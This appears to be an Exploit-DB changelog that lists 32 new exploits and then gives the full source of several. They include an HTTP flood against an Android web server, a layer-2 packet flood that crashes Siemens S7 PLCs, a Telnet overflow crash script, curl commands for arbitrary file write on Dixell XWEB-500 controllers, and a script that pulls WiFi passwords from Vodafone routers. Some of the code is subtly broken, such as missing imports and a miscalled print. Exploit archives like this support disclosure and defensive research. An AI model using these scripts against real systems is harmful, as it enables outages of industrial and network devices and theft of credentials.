DB: 2022-01-06

32 changes to exploits/shellcodes

Siemens S7 Layer 2 - Denial of Service (DoS)
TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
Automox Agent 32 - Local Privilege Escalation
ConnectWise Control 19.2.24707 - Username Enumeration
Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
AWebServer GhostBuilding 18 - Denial of Service (DoS)
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
Dixell XWEB 500 - Arbitrary File Write
Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
CMSimple 5.4 - Cross Site Scripting (XSS)
RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
Nettmp NNT 5.1 - SQLi Authentication Bypass
Hostel Management System 2.1 - Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
Hospitals Patient Records Management System 1.0 - Account TakeOver
Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
openSIS Student Information System 8.0 - 'multiple' SQL Injection
Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)

exploits/android/remote/50629.py

@@ -0,0 +1,85 @@
+# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)
+# Date: 28/12/2021
+# Exploit Author: Andres Ramos [Invertebrado]
+# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm
+# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en
+# Version: AWebServer GhostBuilding 18
+# Tested on: Android
+
+#!/usr/bin/python3
+
+# *********************************************************************************
+# * Author: Andres Ramos [Invertebrado] *
+# * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash *
+# *********************************************************************************
+
+import signal
+import requests
+from pwn import *
+
+#Colors
+class colors():
+ GREEN = "\033[0;32m\033[1m"
+ END = "\033[0m"
+ RED = "\033[0;31m\033[1m"
+ BLUE = "\033[0;34m\033[1m"
+ YELLOW = "\033[0;33m\033[1m"
+ PURPLE = "\033[0;35m\033[1m"
+ TURQUOISE = "\033[0;36m\033[1m"
+ GRAY = "\033[0;37m\033[1m"
+
+exit = False
+
+def def_handler(sig, frame):
+ print(colors.RED + "\n[!] Exiting..." + colors.END)
+ exit = True
+ sys.exit(0)
+
+ if threading.activeCount() > 1:
+ os.system("tput cnorm")
+ os._exit(getattr(os, "_exitcode", 0))
+ else:
+ os.system("tput cnorm")
+ sys.exit(getattr(os, "_exitcode", 0))
+
+signal.signal(signal.SIGINT, def_handler)
+
+if len(sys.argv) < 3:
+ print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END)
+ sys.exit(1)
+
+url = sys.argv[1]
+Tr = sys.argv[2]
+
+def http():
+ counter = 0
+ p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)
+ while True:
+ r = requests.get(url)
+ r = requests.get(url + "/mysqladmin")
+ counter += 2
+ p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)
+
+ if exit:
+ break
+
+if __name__ == '__main__':
+
+ threads = []
+
+ try:
+ for i in range(0, int(Tr)):
+ t = threading.Thread(target=http)
+ threads.append(t)
+
+ sys.stderr = open("/dev/null", "w")
+
+ for x in threads:
+ x.start()
+
+ for x in threads:
+ x.join()
+
+ except Exception as e:
+ log.failure(str(e))
+ sys.exit(1)

exploits/hardware/dos/50613.py

@@ -0,0 +1,105 @@
+# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
+# Date: 21/10/2021
+# Exploit Author: RoseSecurity
+# Vendor Homepage: https://www.siemens.com/us/en.html
+# Version: Firmware versions >= 3
+# Tested on: Siemens S7-300, S7-400 PLCs
+
+
+#!/usr/bin/python3
+
+from scapy.all import *
+from colorama import Fore, Back, Style
+from subprocess import Popen, PIPE
+from art import *
+import threading
+import subprocess
+import time
+import os
+import sys
+import re
+
+# Banner
+
+print(Fore.RED + r"""
+
+ ▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄
+▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █·
+▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄
+▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
+ ▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀
+▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄
+•██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █·
+ ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄
+ ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
+ ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀
+ """)
+
+time.sleep(1.5)
+
+# Get IP to exploit
+
+IP = input("Enter the IP address of the device to exploit: ")
+
+# Find the mac address of the device
+
+Mac = getmacbyip(IP)
+
+# Function to send the ouput to "nothing"
+
+def NULL ():
+
+ f = open(os.devnull, 'w')
+ sys.stdout = f
+
+# Eternal loop to produce DoS condition
+
+def Arnold ():
+
+ AutomatorTerminator = True
+
+ while AutomatorTerminator == True:
+ Packet = Ether()
+ Packet.dst = "00:00:00:00:00:00"
+ Packet.src = Mac
+ sendp(Packet)
+ NULL()
+def Sarah ():
+
+ AutomatorTerminator = True
+
+ while AutomatorTerminator == True:
+ Packet = Ether()
+ Packet.dst = "00:00:00:00:00:00"
+ Packet.src = Mac
+ sendp(Packet)
+ NULL()
+def Kyle ():
+ AutomatorTerminator = True
+
+ while AutomatorTerminator == True:
+ Packet = Ether()
+ Packet.dst = "00:00:00:00:00:00"
+ Packet.src = Mac
+ sendp(Packet)
+ NULL()
+
+# Arnold
+ArnoldThread = threading.Thread(target=Arnold)
+ArnoldThread.start()
+ArnoldThread.join()
+NULL()
+
+# Sarah
+
+SarahThread = threading.Thread(target=Sarah)
+SarahThread.start()
+SarahThread.join()
+NULL()
+
+# Kyle
+
+KyleThread = threading.Thread(target=Kyle)
+KyleThread.start()
+KyleThread.join()
+NULL()

exploits/hardware/remote/50620.py

@@ -0,0 +1,41 @@
+# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 22/12/2021
+# Vendor Homepage: https://www.accu-time.com/
+# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/
+# Tested Version: 1.0
+# Vulnerability Type: Buffer Overflow (DoS) Remote
+# Tested on OS: linux
+
+# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow
+
+# Steps to reproduce:
+# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23
+# 2. - Run the Script from remote PC/IP
+# 3. - Telnet Crashed
+
+#!/usr/bin/env python3
+
+import socket
+import sys
+print("#######################################################")
+print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #")
+print("# -------------------------- #")
+print("# BY Yehia Elghaly #")
+print("#######################################################")
+
+if (len(sys.argv)<2):
+ print ("Usage: %s <Target Host> ") % sys.argv[0]
+ print ("Example: %s 192.168.113.1 ") % sys.argv[0]
+ exit(0)
+
+print ("\nSending Evil.......Buffer...")
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+
+try:
+ s.connect((sys.argv[1], 23))
+ buffer = "A"*9400
+ s.send(" Crashed Check the connection")
+ Print ("Crashed")
+except:
+ print ("Could not connect to ACCU Time Telnet!")

exploits/hardware/remote/50639.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Dixell XWEB-500 - Arbitrary File Write
+# Google Dork: inurl:"xweb500.cgi"
+# Date: 03/01/2022
+# Exploit Author: Roberto Palamaro
+# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
+# Version: XWEB-500
+# Tested on: Dixell XWEB-500
+# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/
+
+# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability
+
+# Endpoint: logo_extra_upload.cgi
+# Here the first line of the POC is the filename and the second one is the content of the file be written
+# Write file
+echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
+# Verify
+curl -A Chrome -is "http://[target]:[port]/logo/"
+
+# Endpoint: lo_utils.cgi
+# Here ACTION=5 is to enable write mode
+echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
+# Verify using ACTION=3 to listing resources
+echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
+
+# Endpoint: cal_save.cgi
+# Here the first line of the POC is the filename and the second one is the content of the file be written
+echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
+# Verify
+curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi

exploits/hardware/webapps/50636.py

@@ -0,0 +1,27 @@
+# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
+# Date: 01/01/2022
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://www.vodafone.es/
+# Software Link: N/A
+# Version: Firmware version Vodafone-H-500-s-v3.5.10
+# Hardware model: Sercomm VFH500
+
+# The WiFi access point password gets disclosed just by performing a GET request with certain headers
+
+import requests
+import sys
+import json
+if len(sys.argv) != 2:
+print("Usage: python3 vodafone-pass-disclose.py http://IP")
+sys.exit()
+url = sys.argv[1]+"/data/activation.json"
+cookies = {"pageid": "129"}
+headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+
+Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
+Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
+With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}
+
+req=requests.get(url, headers=headers, cookies=cookies)
+result=json.loads(req.text)[3].get("wifi_password")
+print("[+] The wifi password is: "+result)